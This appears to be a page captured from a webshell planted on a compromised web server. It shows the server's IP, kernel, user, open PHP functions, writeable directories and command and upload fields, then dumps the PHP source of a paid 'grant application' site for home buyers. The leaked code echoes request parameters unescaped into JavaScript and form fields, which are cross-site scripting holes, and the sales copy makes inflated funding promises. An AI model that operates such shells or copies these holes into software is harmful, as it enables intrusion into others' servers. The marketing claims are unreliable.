403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/fundingapplications.com/First-Time-Home-Buyer/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/fundingapplications.com/First-Time-Home-Buyer/index.php
<?php 
require_once($_SERVER['DOCUMENT_ROOT'].'/inc/php_header.php');
if(!empty($_GET['prm'])) {
	$prm_arr = explode('|',UnCryptify($_GET['prm']));
	$prm = array();
	$prm['cid'] = $prm_arr[0];
	$prm['sid'] = $prm_arr[1];
	$prm['initial'] = $prm_arr[2];
	$prm['monthly'] = $prm_arr[3];
	$_SESSION['prm'] = $prm;
}

//echo '<!-- https://fundingapplications.com/order.php?s=1&prm='.Cryptify('Chat|Alesha|'.($_INITIAL_FEE*0.8).'|'.($_MONTHLY_FEE)).' -->';

$categories = get_categories();
$business_questions = get_business_questions();
$trackerformparams = $tracker->FormParameters();
$title = 'First Time Home Buyer';
$body_id = 'index';
require_once($_SERVER['DOCUMENT_ROOT'].'/header.php'); ?>
<script type="text/javascript" src="https://fundingapplications.com/js/jquery.1.11.1.min.js"></script>
<script type="text/javascript" src="https://fundingapplications.com/js/jquery.formatter.min.js"></script>
<script type="text/javascript">
function checkZip(zip,me) {
	zip = zip.replace(/[^0-9]/g,'');
	if(zip.length==5) {
		var str = 'zip='+encodeURIComponent(zip);
		$.ajax
		({
			cache: false,
			type: "POST",
			dataType:"json",
			data: str,
			url: "https://fundingapplications.com/js/php/ZipToCity.php",	
			success: function(data)
			{
				if(!data.error) {
					$('[name=cc_city]').val(data.city);
					$('[name=cc_state]').val(data.state);
				}
			},error: function(jqXHR, textStatus, errorThrown) {
			}
		});	
	}
}
$(document).ready( function() {
	$('.subcategory,.subtext,#education_questions,#business_questions').hide().find('input,select,textarea').attr('disabled','disabled');
	$('input[name=category_id]').click( function() {
		var show_class = $(this).attr('class'); 
		var subcat_elements = $('.subcategory[class~='+show_class+']'); 

		$('.subcategory').hide().find('input,select,textarea').attr('disabled', 'disabled'); 

    	if(subcat_elements.length > 0) {
			$('#subcategories').show(); 
			subcat_elements.show().find('input,select,textarea').removeAttr('disabled'); 
    	} else {
			$('#subcategories').hide().find('input,select,textarea').attr('disabled', 'disabled');
    	}
		
		var granttype = $(this).parents('td:first').attr('id');
		$('#granttype_input').val(granttype);
		
		var amount_needed = $('select[name=app_amount_needed]').val();
		if(granttype == 'business') {
			$('#amount_needed').html('<select name="app_amount_needed"><option selected>Select</option><option value="$500 - $10,000">$500 - $10,000</option><option value="$10,000 - $25,000">$10,000 - $25,000</option><option value="$25,000 - $50,000">$25,000 - $50,000</option><option value="$50,000 - $100,000">$50,000 - $100,000</option><option value="$100,000 - $250,000">$100,000 - $250,000</option><option value="$250,000 - $500,000">$250,000 - $500,000</option><option value="$500,000 - $1,000,000">$500,000 - $1,000,000</option><option value="$1,000,000 +">$1,000,000 +</option></select>');
			$('#business_questions').show('slow').find('input,select,textarea').removeAttr('disabled');
		} else {
			$('#amount_needed').html('<select name="app_amount_needed"><option selected>Select</option><option value="$500 - $10,000">$500 - $10,000</option><option value="$10,000 - $25,000">$10,000 - $25,000</option><option value="$25,000 - $50,000">$25,000 - $50,000</option><option value="$50,000 - $100,000">$50,000 - $100,000</option><option value="$100,000 or More">$100,000 or More</option></select>');
			$('#business_questions').hide('slow').find('input,select,textarea').attr('disabled','disabled');
		}
		
		/*if($(this).val() == '2') { //education
			$('#education_questions').show().find('input,select,textarea').removeAttr('disabled');
		} else {
			$('#education_questions').hide().find('input,select,textarea').attr('disabled','disabled');
		}*/
	});
	$('input[name=phone_full]').formatter({
	  'pattern': '({{999}}) {{999}}-{{9999}}',
	  'persistent': false
	});
	<?php
		if(!empty($_REQUEST)) {
			echo "$('input:radio[name=category_id]').filter(function() { return $(this).val()=='{$_REQUEST['category_id']}'; }).click();\n";
		}
	?>
});
</script>
				<style type="text/css">
                    <!--
                    .ads img	{border:none!important}
                    -->
                    </style>
                    <div style="float:right; width:310px; padding-left:20px;" class="sidebarIcons">
                        <div class="app" style="background-image:url(../images/appBusiness.png)" onclick="document.getElementById('inp_business').checked = true; test(); window.location='#form'"></div>
                        <div class="app" style="background-image:url(../images/appMinorities.png)" onclick="document.getElementById('inp_business').checked = true; test(); document.getElementById('inp5').checked = true; window.location='#form'"></div>
                        <div class="app" style="background-image:url(../images/appRealEstate.png)" onclick="document.getElementById('inp_realestate').checked = true; test(); window.location='#form'"></div>
                        <div class="app" style="background-image:url(../images/appTechnology.png)" onclick="document.getElementById('inp_education').checked = true; test(); document.getElementById('inp10').checked = true; window.location='#form'"></div>
                        <div class="app" style="background-image:url(../images/appMedical.png)" onclick="document.getElementById('inp_personal').checked = true; test(); document.getElementById('inp34').checked = true; window.location='#form'"></div>
                        <div class="app" style="background-image:url(../images/appSenior.png)" onclick="document.getElementById('inp_personal').checked = true; test(); document.getElementById('inp30').checked = true; window.location='#form'"></div>
                        <div class="app" style="background-image:url(../images/appWomen.png)" onclick="document.getElementById('inp_business').checked = true; test(); document.getElementById('inp9').checked = true; window.location='#form'"></div>
                        <div class="app" style="background-image:url(../images/appEducation.png)" onclick="document.getElementById('inp_education').checked = true; test(); window.location='#form'"></div>
                        <div class="app" style="background-image:url(../images/appChildcare.png)" onclick="document.getElementById('inp_personal').checked = true; test(); document.getElementById('inp35').checked = true; window.location='#form'"></div>

                        <table id="sidebar" class="ads" style="margin-top:15px">
                            <tr>
                                <td class="sidebar_top">Client Testimonials</td>
                            </tr>
                            <tr>
                                <td class="sidebar_in" height="400px">
                                    <div>
                                        <p>"Straight forward and to the point."</p>
                                        <span>-James B. Wilcox</span>
                                    </div>
                                    <!--div>
                                        <p>"I specifically liked the fact that your services are affordable and very easy to follow along. I would tell people that your services are a good opportunity for people like me who need a bit of help and just don't know where to start at."</p>
                                        <span>-Aurora Olivas</span>
                                    </div-->
                                    <div>
                                        <p>"This site is best site so far. It has user friendly tabs and is very informative."</p>
                                        <span>-Kelly Reese</span>
                                    </div>
                                    <div>
                                        <p>"It is easy to find what you want even if you are not good with a computer!"</p>
                                        <span>-Tabatha Ubel</span>
                                    </div>
                                    <!--div>
                                        <p>"The directions and information are very clear. This is a great website if you're looking for grants."</p>
                                        <span>-Jacqueline Carlson</span>
                                    </div-->
                                    <div>
                                        <p>"It was easy to fill out and follow cuz I am new to the computer. Everything was straight forward so I could understand it."</p>
                                        <span>-JoDee Cooley</span>
                                    </div>
                                    <div>
                                        <p>"Kind people, patient people. Specific help was given if needed. I liked how easy to understand and easy your site was to read."</p>
                                        <span>-Melissa Collins</span>
                                    </div>
                                    <div>
                                        <p>"The website provided the information that I needed to be guided to the correct location and it is not too wordy."</p>
                                        <span>-Glenn Carter</span>
                                    </div>
                                    <!--div>
                                        <p>"I am impressed with the fact that there are so many grants and funding that one can apply for - and there is a lot of content on the site. Funding Applications.org is a good, informational site that can help you obtain a grant/funding. All types of grants for anyone... just apply and you could get the money you deserve."</p>
                                        <span>-Audrey Sims</span>
                                    </div-->
                                </td>
                            </tr>
                            <tr>
                                <td class="sidebar_bot"></td>
                            </tr>
                        </table>
						<?php if(!in_array(basename($_SERVER['SCRIPT_NAME']),array('order.php','confirm.php','order_form.php'))) { ?>
						
						 <? require_once($_SERVER['DOCUMENT_ROOT'].'/ads.php'); ?>
						<?php } ?>
                    </div>
				
            	<h1>Grant Applications for First Time Home Buyers</h1>
            	<p class="text"><img style="float:left; padding-right: 15px; padding-bottom:15px;" src="images/small-business-owner.jpg">Are you currently a homeowner or looking into becoming one? Tired of living in your parent’s basement? Ready to get out of grandma’s house and move with your family into your very own home? If you said “yes” to any one of these questions, you are most likely looking to buy your very first home. Maybe you’re not sure where to get started or how you will be able to afford it? You might be wondering why buy when you can just rent? Buying a home is an investment, you are able to deduct the mortgage from taxes and you can end up saving money, plus having your very own place to call home. So there’s no need to worry because we have already done all the research and are here to help! 
</p>

            	<p class="text">The website for the Federal government’s housing and urban development (HUD) says “buying a home is the single most important financial decision”.  We want you to have all of the right knowledge needed to make such an important decision.  How often do you buy your first home? So this will be your first chance to use the programs designed for first time home buyers.  So work with us.  We are able to help you and assist you to get on the right road to buying your first home.  The HUD recently helped 3.5 million homeowners with grants, loans, subsidies and other programs.  You just need to know how you qualify.  Programs like these can significantly decrease lower monthly payments, down payment, and even get 50 percent off your home if you qualify.  Maybe you even live in a state where the HUD Dollar homes programs are available. 
</p>

            
            	<p class="text">You might contemplate a government backed loan; well they have been aiding people with their first home purchase since 1934.  So how is that possible? The Federal Housing Administration (FHA) – part of HUD – insures the loan, to allow your lender to propose a better deal for you.  
</p>

				<h2>How does HUD help?</h2>
            	<p class="text">HUD assists loans for first-time mortgages. Although HUD doesn’t loan money straight to buyers as they purchase a home, approved lenders of the FHA make loans through other FHA insurance programs. HUD states, “for those who can meet certain eligibility requirements, some of the many benefits of FHA loans are:</p>
            	
            	<ul>
            	<li>Lower cost: FHA loans have competitive interest rates because the Federal government insures the loans. Make sure to always compare an FHA loan with other types of loans.
</li>
            	<li>Easier to qualify for: Because FHA insures your mortgage; lenders may be more willing to give you loan terms that make it easier for you to qualify.</li>
            	<li>Work with less than perfect credit: You do not need a perfect credit score to get an FHA mortgage. Even if you have had credit problems, such as a bankruptcy, it may be easier for you to qualify for an FHA loan than a conventional loan.</li>
            	<li>Low down payments: FHA loans have a low 3.5 percent down payment. Money for your down payment can come from a family member, employer or charitable organization as a gift. Other loan programs do not allow this.”</li>
            	</ul>
            	
            	
            	<p class="text">Your choices aren’t just restricted to FHA loans. There are other Federal agencies that can sponsor your first home purchase under certain circumstances. The U.S. Department of Agriculture, USDA, for example, offers Rural Housing Loans to applicants whose potential home is found within an eligible rural area and whose income doesn’t exceed 60% of that area’s income. Another option could be a VA Home Loan; the U.S Department of Veterans affairs offers a certain percentage of home loans to active duty service members, present Army Reserve and Army National Guard members, veterans who qualify, and even some surviving spouses. These loans can also be refinanced.   There are also programs specifically designed for government employees like teachers or police officers that allow you to buy a home up to 50% off and thousands of nonprofit agencies who purchase and fix up homes at a discount to rebuild the community and the families who are in need.
</p>
            	
            	<h2>Apply Today!</h2>
            	<p class="text">Can you imagine how much that could benefit your family for years to come?  So don’t waste your time navigating this alone – Let our experts help you. We recognize these choices might not be appropriate for your present situation, but we have done all the research and are here to help you become a homebuyer. We want to help make the experience of buying your very first home affordable, successful and joyful for you and your entire family.</p>
            	
                <?php if(!empty($_SESSION['prm'])) { ?>
				<p class="text" style="color:#33aa66">Thanks to <?= $_SESSION['prm']['sid']; ?>, you can get access to these funding opportunities for only <span style='text-decoration:line-through'>$<?= $_INITIAL_FEE; ?></span> $<?= $_SESSION['prm']['initial']; ?>.</p>
                <?php } ?>
				<a name="form"></a>
                <form action='https://fundingapplications.com/order.php' method='post'>
            	<table id="form" cellspacing="0" cellpadding="0">
                	<tr>
                    	<td class="form_top">Funding Application Registration</td>
                    </tr>
                	<tr>
                    	<td class="form_in" height="400px">
                        
                        	<table cellpadding="0" cellspacing="0" id="select">
                            	<tr>
                                	<td id="personal" class="personal">
                                    	<img src="https://fundingapplications.com/images/select_tl.png" style="float:left" />
                                    	<img src="https://fundingapplications.com/images/select_tr.png" style="float:right" />
                                    	<div>
                                        	<label><input type="radio" name="category_id" id="inp_personal" value="4" onclick="test();" />PERSONAL</label>
                                        </div>
                                    </td>
                                	<td id="education" class="education">
                                    	<img src="https://fundingapplications.com/images/select_tl.png" style="float:left" />
                                    	<img src="https://fundingapplications.com/images/select_tr.png" style="float:right" />
                                    	<div>
                                        	<label><input type="radio" name="category_id" id="inp_education" value="2" onclick="test();" />EDUCATION</label>
                                        </div>
                                    </td>
                                	<td id="realestate" class="realestate">
                                    	<img src="https://fundingapplications.com/images/select_tl.png" style="float:left" />
                                    	<img src="https://fundingapplications.com/images/select_tr.png" style="float:right" />
                                    	<div>
                                        	<label><input type="radio" name="category_id" id="inp_realestate" value="5" onclick="test();" />REAL ESTATE</label>
                                        </div>
                                    </td>
                                	<td id="business" class="business">
                                    	<img src="https://fundingapplications.com/images/select_tl.png" style="float:left" />
                                    	<img src="https://fundingapplications.com/images/select_tr.png" style="float:right" />
                                    	<div>
                                        	<label><input type="radio" name="category_id" id="inp_business" value="1" onclick="test();" />BUSINESSES</label>
                                        </div>
                                    </td>
                                </tr>
                            </table>
                            <table cellpadding="0" cellspacing="0" class="select" id="a1">
                            	<tr>
                                	<td></td>
                                	<td></td>
                                	<td class="tr"></td>
                            	<tr>
                            	</tr>
                                	<td></td>
                                	<td>
										<?php $counter = 0; if(!empty($categories['subcategories'])) {
											echo '<ul>';
											foreach($categories['subcategories'] as $subcats) {
												if(isset($subcats['categories'][4])) { $counter++;
													if($counter > 5) { $counter=0; echo '</ul><ul>'; }
													?><li><label><input type="checkbox" class="check" name="subcategories[]" value="<?= $subcats['id'];?>" /><?= $subcats['name']; ?></label></li><?php
												}
											}
											echo '</ul>';
										}?>
                                        <span><img src="https://fundingapplications.com/images/arrow_up.png" />Highlight All Applicable Personal Sub-Categories<img src="https://fundingapplications.com/images/arrow_up.png" /></span>
                                    </td>
                                	<td></td>
                                </tr>
                            	<tr>
                                	<td class="bl"></td>
                                	<td></td>
                                	<td class="br"></td>
                            	</tr>
                            </table>
                            <table cellpadding="0" cellspacing="0" class="select" id="a2">
                            	<tr>
                                	<td class="tl"></td>
                                	<td></td>
                                	<td class="tr"></td>
                            	<tr>
                            	<tr>
                                	<td></td>
                                	<td>
                                    	<?php $counter = 0; if(!empty($categories['subcategories'])) {
											echo '<ul>';
											foreach($categories['subcategories'] as $subcats) {
												if(isset($subcats['categories'][2])) { $counter++;
													if($counter > 5) { $counter=0; echo '</ul><ul>'; }
													?><li><label><input type="checkbox" class="check" name="subcategories[]" value="<?= $subcats['id'];?>" /><?= $subcats['name']; ?></label></li><?php
												}
											}
											echo '</ul>';
										}?>
                                        <span><img src="https://fundingapplications.com/images/arrow_up.png" />Highlight All Applicable Education Sub-Categories<img src="https://fundingapplications.com/images/arrow_up.png" /></span>
                                    </td>
                                	<td></td>
                                </tr>
                            	<tr>
                                	<td class="bl"></td>
                                	<td></td>
                                	<td class="br"></td>
                            	</tr>
                            </table>
                            <table cellpadding="0" cellspacing="0" class="select" id="a3">
                            	<tr>
                                	<td class="tl"></td>
                                	<td></td>
                                	<td class="tr"></td>
                            	<tr>
                            	<tr>
                                	<td></td>
                                	<td>
                                        <?php $counter = 0; if(!empty($categories['subcategories'])) {
											echo '<ul>';
											foreach($categories['subcategories'] as $subcats) {
												if(isset($subcats['categories'][5])) { $counter++;
													if($counter > 5) { $counter=0; echo '</ul><ul>'; }
													?><li><label><input type="checkbox" class="check" name="subcategories[]" value="<?= $subcats['id'];?>" /><?= $subcats['name']; ?></label></li><?php
												}
											}
											echo '</ul>';
										}?>
                                        <span><img src="https://fundingapplications.com/images/arrow_up.png" />Highlight All Applicable Real Estate Sub-Categories<img src="https://fundingapplications.com/images/arrow_up.png" /></span>
                                    </td>
                                	<td></td>
                                </tr>
                            	<tr>
                                	<td class="bl"></td>
                                	<td></td>
                                	<td class="br"></td>
                            	</tr>
                            </table>
                            <table cellpadding="0" cellspacing="0" class="select" id="a4">
                            	<tr>
                                	<td class="tl"></td>
                                	<td></td>
                                	<td></td>
                            	<tr>
                            	<tr>
                                	<td></td>
                                	<td>
                                        <?php $counter = 0; if(!empty($categories['subcategories'])) {
											echo '<ul>';
											foreach($categories['subcategories'] as $subcats) {
												if(isset($subcats['categories'][1])) { $counter++;
													if($counter > 5) { $counter=0; echo '</ul><ul>'; }
													?><li><label><input type="checkbox" class="check" name="subcategories[]" value="<?= $subcats['id'];?>" /><?= $subcats['name']; ?></label></li><?php
												}
											}
											echo '</ul>';
										}?>
                                        <span><img src="https://fundingapplications.com/images/arrow_up.png" />Highlight All Applicable Business Sub-Categories<img src="https://fundingapplications.com/images/arrow_up.png" /></span>
                                    </td>
                                	<td></td>
                                </tr>
                            	<tr>
                                	<td class="bl"></td>
                                	<td></td>
                                	<td class="br"></td>
                            	</tr>
                            </table>
                            
							<script language="JavaScript">
                                function test() {
                                    if (document.getElementById('inp_personal').checked == true) {
                                        document.getElementById('personal').className = 'personal_';
                                        document.getElementById('education').className = 'education';
                                        document.getElementById('realestate').className = 'realestate';
                                        document.getElementById('business').className = 'business';
                                        switchid('a1');
                                    }
                                    if (document.getElementById('inp_education').checked == true) {
                                        document.getElementById('personal').className = 'personal';
                                        document.getElementById('education').className = 'education_';
                                        document.getElementById('realestate').className = 'realestate';
                                        document.getElementById('business').className = 'business';
                                        switchid('a2');
                                    }
                                    if (document.getElementById('inp_realestate').checked == true) {
                                        document.getElementById('personal').className = 'personal';
                                        document.getElementById('education').className = 'education';
                                        document.getElementById('realestate').className = 'realestate_';
                                        document.getElementById('business').className = 'business';
                                        switchid('a3');
                                    }
                                    if (document.getElementById('inp_business').checked == true) {
                                        document.getElementById('personal').className = 'personal';
                                        document.getElementById('education').className = 'education';
                                        document.getElementById('realestate').className = 'realestate';
                                        document.getElementById('business').className = 'business_';
                                        switchid('a4');
                                    }
                                }
                                
                                //here you place the ids of every element you want.
                                var ids=new Array('a1','a2','a3','a4');
                                
                                function switchid(id){	
                                    hideallids();
                                    showdiv(id);
                                }
                                
                                function hideallids(){
                                    //loop through the array and hide each element by id
                                    for (var i=0;i<ids.length;i++){
                                        hidediv(ids[i]);
                                    }		  
                                }
                                
                                function hidediv(id) {
                                    //safe function to hide an element with a specified id
                                    if (document.getElementById) { // DOM3 = IE5, NS6
                                        document.getElementById(id).style.display = 'none';
                                    }
                                    else {
                                        if (document.layers) { // Netscape 4
                                            document.id.display = 'none';
                                        }
                                        else { // IE 4
                                            document.all.id.style.display = 'none';
                                        }
                                    }
                                }
                                
                                function showdiv(id) {
                                    //safe function to show an element with a specified id
                                          
                                    if (document.getElementById) { // DOM3 = IE5, NS6
                                        document.getElementById(id).style.display = 'block';
                                    }
                                    else {
                                        if (document.layers) { // Netscape 4
                                            document.id.display = 'block';
                                        }
                                        else { // IE 4
                                            document.all.id.style.display = 'block';
                                        }
                                    }
                                }
                            </script>

                            <table cellpadding="0" cellspacing="0" border="0" class="form_table">
                                <tr>
                                    <td>citizenship</td>
                                    <td>age</td>
                                    <td colspan="2">gender</td>
                                </tr>
                                <tr>
                                    <td><select class="third_" name="app_citizenship">
                                        <option value="" >Select</option>

                                        <option value="citizen" >U.S. Citizen</option>
                                        <option value="resident" >Resident Alien</option>
                                        <option value="greencard" >Green Card Holder</option>
                                        <option value="permanent" >Permanent Resident</option>
                                        <option value="unsure" >Not Sure</option>
                                    </select></td>

                                    <td><input type="tel" maxlength="3" class="third" name="app_age" value="" /></td>
                                    <td colspan="2">
                                        <label><input type="radio" name="app_gender" class="radio" value="male"  />male</label>
                                        <label><input type="radio" name="app_gender" class="radio" value="female"  />female</label>
                                    </td>
                                </tr>
                            </table>
                            <?php /*
							<table cellpadding="0" cellspacing="0" border="0" class="form_table" id="disability_questions">
							<?php foreach($disability_questions['questions'] as $slug=>$data) {?>
								<tr>
									<td><?= $data['name'];?></td>
								</tr>
								<tr>
									<td>
										<?php if($data['type']=='bool') {?>
										<label><input type="radio" value="1" name="<?= $slug;?>" id="<?= $slug;?>_yes" /> Yes</label>
										<label><input type="radio" value="0" name="<?= $slug;?>" id="<?= $slug;?>_no" /> No</label>
										<?php } elseif(strpos($data['type'],'range') > -1) {
											$range = array();
											$pieces = explode(':',$data['type']);
											$range_limits = explode('-',$pieces[1]);
											if($range_limits[0] > $range_limits[1]) {
												for($i=$range_limits[0]; $i>=$range_limits[1]; $i--) {
													$range[$i] = $i;
												}
											} else {
												for($i=$range_limits[0]; $i<=$range_limits[1]; $i++) {
													$range[$i] = $i;
												}
											}
										?>
										<select name="<?= $slug;?>" id="<?= $slug;?>">
										<option value="">Select</option>
											<?php foreach($range as $i=>$j) {?>
												<option value="<?= $i;?>"><?= $j;?></option>
											<?php }?>
										</select>
										<?php } elseif($data['type']=='textarea') {
										?>
										<textarea name="<?= $slug;?>" id="<?= $slug;?>"></textarea>
										<?php
										}
								sub_question_recursive_disability($slug);
										?>
									</td>
								</tr>
							<?php } ?>
							</table>
							*/?>
							<?php /*<table cellpadding="0" cellspacing="0" border="0" class="form_table" id="education_questions">
							<?php foreach($education_questions['questions'] as $slug=>$data) {?>
								<tr>
									<td><?= $data['name'];?></td>
								</tr>
								<tr>
									<td>
										<?php if($data['type']=='bool') {?>
										<label><input type="radio" value="1" name="<?= $slug;?>" id="<?= $slug;?>_yes" /> Yes</label>
										<label><input type="radio" value="0" name="<?= $slug;?>" id="<?= $slug;?>_no" /> No</label>
										<?php } elseif(strpos($data['type'],'range') > -1) {
											$range = array();
											$pieces = explode(':',$data['type']);
											$range_limits = explode('-',$pieces[1]);
											if($range_limits[0] > $range_limits[1]) {
												for($i=$range_limits[0]; $i>=$range_limits[1]; $i--) {
													$range[$i] = $i;
												}
											} else {
												for($i=$range_limits[0]; $i<=$range_limits[1]; $i++) {
													$range[$i] = $i;
												}
											}
										?>
										<select name="<?= $slug;?>" id="<?= $slug;?>">
										<option value="">Select</option>
											<?php foreach($range as $i=>$j) {?>
												<option value="<?= $i;?>"><?= $j;?></option>
											<?php }?>
										</select>
										<?php }
								sub_question_recursive($slug);
										?>
									</td>
								</tr>
							<?php } ?>
							</table>*/?>
							<table cellpadding="0" cellspacing="0" border="0" class="form_table" id="business_questions">
							<tr>
								<td>What are the major financial needs for your business? <i>(Check all that apply)</i></td>
							</tr>
							<?php foreach($business_questions['questions'] as $slug=>$data) {?>
								<tr>
									<td>
										<label><input type="checkbox" value="1" name="<?= $slug;?>" id="<?= $slug;?>_yes" style="vertical-align:middle;" /> <?= $data['name'];?></label>
									</td>
								</tr>
							<?php } ?>
							</table>
                            <table cellpadding="0" cellspacing="0" border="0" class="form_table">

                                <tr>
                                    <td>How much funding are you looking for?</td>
                                </tr>
                                <tr>
                                    <td id="amount_needed"><select name="app_amount_needed">
                                        <option selected>Select</option>
                                        <option value="$500 - $10,000" >$500 - $10,000</option>

                                        <option value="$10,000 - $25,000" >$10,000 - $25,000</option>
                                        <option value="$25,000 - $50,000" >$25,000 - $50,000</option>
                                        <option value="$50,000 - $100,000" >$50,000 - $100,000</option>
                                        <option value="$100,000 or More" >$100,000 or More</option>
                                    </select></td>
                                </tr>
                                <tr>

                                    <td>Describe in detail how you'll use the money:</td>
                                </tr>
                                <tr>
                                    <td><textarea name="app_usedescription"></textarea></td>
                                </tr>
                                <tr>
                                    <td>What makes you the ideal candidate for this funding?</td>

                                </tr>
                                <tr>
                                    <td><textarea name="app_uniqueness"></textarea></td>
                                </tr>
                            </table>
                            
                            <table cellpadding="0" cellspacing="0" border="0" class="form_table">
                                <tr>
                                    <td colspan="2">first name</td>

                                    <td colspan="2">last name</td>
                                </tr>
                                <tr>
                                    <td colspan="2"><input type="text" class="full" name="cc_fname" value="" /></td>
                                    <td colspan="2"><input type="text" class="full" name="cc_lname" value="" /></td>
                                </tr>
                                <tr>
                                    <td colspan="2">street address</td>
									<td colspan="2">zip</td>

                                </tr>
                                <tr>
                                    <td colspan="2"><input type="text" class="full" name="cc_addr" value="" /></td>
									<td colspan="2"><input type="tel" class="full" maxlength="5" id="id-cc-zip" name="cc_zip" onkeyup="checkZip($(this).val(),this);" value="<?= isset($_REQUEST['cc_zip']) ? $_REQUEST['cc_zip'] : null;?>" /></td>
                                </tr>
                                <tr>
									<td colspan="2">city</td>
									<td colspan="2">state</td>
								</tr>
								<tr>
									<td colspan="2">
										<input type="text" name="cc_city" class="full" value="<?= $_POST['cc_city'];?>" />
									</td>
									<td colspan="2">
										<select name="cc_state" class="full">
										<?php
											$_STATES = array(''=>'','AL'=>'Alabama','AK'=>'Alaska','AS'=>'American Samoa','AZ'=>'Arizona','AR'=>'Arkansas','CA'=>'California','CO'=>'Colorado','CT'=>'Connecticut','DE'=>'Delaware','DC'=>'District of Columbia','FM'=>'Federated States of Micronesia','FL'=>'Florida','GA'=>'Georgia','GU'=>'Guam','HI'=>'Hawaii','ID'=>'Idaho','IL'=>'Illinois','IN'=>'Indiana','IA'=>'Iowa','KS'=>'Kansas','KY'=>'Kentucky','LA'=>'Louisiana','ME'=>'Maine','MD'=>'Maryland','MH'=>'Marshall Islands','MA'=>'Massachusetts','MI'=>'Michigan','MN'=>'Minnesota','MS'=>'Mississippi','MO'=>'Missouri','MT'=>'Montana','NE'=>'Nebraska','NV'=>'Nevada','NH'=>'New Hampshire','NJ'=>'New Jersey','NM'=>'New Mexico','NY'=>'New York','NC'=>'North Carolina','ND'=>'North Dakota','MP'=>'Northern Mariana Islands','OH'=>'Ohio','OK'=>'Oklahoma','OR'=>'Oregon','PW'=>'Palau','PA'=>'Pennsylvania','PR'=>'Puerto Rico','RI'=>'Rhode Island','SC'=>'South Carolina','SD'=>'South Dakota','TN'=>'Tennessee','TX'=>'Texas','UT'=>'Utah','VT'=>'Vermont','VI'=>'Virgin Islands','VA'=>'Virginia','WA'=>'Washington','WV'=>'West Virginia','WI'=>'Wisconsin','WY'=>'Wyoming');
											foreach($_STATES as $k=>$v) {
											?><option value="<?= $k;?>" <?= ($_POST['cc_state']==$k) ? 'selected' : '';?>><?= $v;?></option><?php
											}
										?>
										</select>
									</td>
								</tr>

                                <tr>
                                    <td colspan="2">phone</td>
                                    <td colspan="2">email</td>
                                </tr>
                                <tr>
                                   <td colspan="2" class="phoneBox"><input type="tel" class="full" name="phone_full" value="<?= $_REQUEST['phone_full'];?>" /></td>
									<td colspan="2"><input type="text" class="full" name="cc_email" value="" /></td>
                                </tr>
                                <tr>
                                    <td colspan="4"><label><input id="inform_me" type="checkbox" name="inform_me" value="1" checked="checked" />Yes, inform me of new funding opportunities!</label></td> 
                                </tr> 
                                <tr> 
                                    <td colspan="4">

                                        <input type="hidden" name="application" value="application">
										<input type="hidden" name="tc" value="<?= $tc; ?>">
										<input type="hidden" name="form_filled_out" value="<?= $_SERVER['REQUEST_URI'];?>" />
				                	
										<?= $trackerformparams; ?>
                                        <input type="submit" class="submit" value="" />
                                       
                                   </td>
                                </tr>
                            </table>
                        </td>
                    </tr>
                	<tr>
                    	<td class="form_bot"></td>
                    </tr>
                </table>
				</form>
                
               
               <h2>Payment and Guarantee</h2>
                <p class="text">In order to pay the online advertising we have to do to get this information out to you, we need to charge a small registration fee of <?= (!empty($_SESSION['prm'])) ? '<span style="text-decoration:line-through">$'.$_INITIAL_FEE.'</span> <span style="color:#33aa66">$'.$_SESSION['prm']['initial'].'</span>' : '$'.$_INITIAL_FEE; ?>. I hope you understand. Remember, this information is updated on a regular basis so you should always have the most current information! Our membership registration fee also comes with a RISK FREE GUARANTEE: If you apply and don't qualify for one of the funding programs on our site, your fee will be refunded to you on the spot!! All you have to do is send us the application and response you received from the funding agency, and we will refund you the <?= (!empty($_SESSION['prm'])) ? '<span style="text-decoration:line-through">$'.$_INITIAL_FEE.'</span> <span style="color:#33aa66">$'.$_SESSION['prm']['initial'].'</span>' : '$'.$_INITIAL_FEE; ?>! You have nothing to lose--either you qualify for Free Funding or you get your money back, GUARANTEED! You will have instant access to the online training program through our exclusive members-only application website.</p>

               <p style="font:bold italic 14pt/140% SegoeUI; color:#DA912E; padding:5px 0 0 10px">What are you waiting for?</p>
               <p class="text">Fill out the <a href="#form">Registration Form</a> above and start your Funding Applications today!</p>
   <img src="https://www.surfcrm.com/lcapi/FormImpressionTracking.php?site=fa&ip_address=<?= $_SERVER['REMOTE_ADDR'];?>&form_url=<?= urlencode($_SERVER['REQUEST_URI']);?>" />
   <script type="text/javascript">
		window.setTimeout(function() {
			var form_session = new Image();
			form_session.src = "https://www.surfcrm.com/lcapi/FormSessionTracking.php?site=fa&ip_address=<?= $_SERVER['REMOTE_ADDR'];?>&form_url=<?= urlencode($_SERVER['REQUEST_URI']);?>";
		},10000);
	</script> 

            </td>
        	<td class="ri"></td>
       	</tr>
    	<tr>
        	<td class="bl"></td>
        	<td class="bt"></td>
        	<td class="br"></td>
       	</tr>
    </table>
    <div id="base">
    	<?php if($login != 'login') : ?>
    	<a style="background-image:url(https://fundingapplications.com/images/login.png); display:block; width:178px; height:44px; float:right; margin:5px 20px 0 10px; padding:0" href="login.php" onclick="window.location='/login.php?tc=<?= $tc; ?><?= $params; ?>'; return false;">&nbsp;</a>
    	<?php endif; ?>
        <ul>
            <li><a href="/" onclick="window.location='/?tc=<?= $tc; ?><?= $params; ?>'; return false;">home page</a></li>
            <li>|</li>
            <li><a href="terms.php" onclick="window.location='/terms.php?tc=<?= $tc; ?><?= $params; ?>'; return false;">terms&nbsp;&amp;&nbsp;conditions</a></li>
            <li>|</li>
            <li><a href="privacy.php" onclick="window.location='/privacy.php?tc=<?= $tc; ?><?= $params; ?>'; return false;">privacy <span class="sml">(updated 04/26/2011)</span></a></li>
            <li>|</li>
            <li><a href="contact.php" onclick="window.location='/contact.php?tc=<?= $tc; ?><?= $params; ?>'; return false;">contact</a></li>
        </ul>
        <p style="text-align:right">Copyright &copy; <? echo date("Y");?> Funding Applications.org</p>
    </div>
</div>
